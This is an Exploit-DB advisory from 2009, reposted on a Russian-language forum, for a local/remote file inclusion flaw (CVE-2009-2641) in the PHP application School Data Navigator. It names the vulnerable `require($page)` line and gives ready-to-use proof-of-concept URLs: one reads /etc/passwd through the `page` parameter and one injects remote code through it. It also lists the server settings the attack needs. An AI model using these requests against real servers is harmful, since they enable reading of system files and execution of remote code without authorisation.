- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 8924
- Проверка EDB
-
- Пройдено
- Автор
- BR0LY
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-2641
- Дата публикации
- 2009-06-10
Код:
----------------------------------------------------------------------------------------------------
Name : School Data Navigator
Site : http://sourceforge.net/projects/school-data-nav/
Down : http://216.92.6.173/data_navigator/app_and_readme.zip
----------------------------------------------------------------------------------------------------
Found By : br0ly
Made in : Brasil
Contact : br0ly[dot]Code[at]gmail[dot]com
----------------------------------------------------------------------------------------------------
Description:
Bug : Local/Remote File Inclusion
Look this: index.php:48: require($page); The variable was not declared properly.
If allow_url_fopen=on --> RFI;
If magic_quotes_gpc=off --> LFI;
----------------------------------------------------------------------------------------------------
P0c:
LFI:http://localhost/Scripts/app_and_readme/navigator/index.php?page=/etc/passwd
RFI: http://localhost/Scripts/app_and_readme/navigator/index.php?page=[EVIL_CODE]
OBS: need register_globals=on;
----------------------------------------------------------------------------------------------------
# milw0rm.com [2009-06-10]- Источник
- www.exploit-db.com
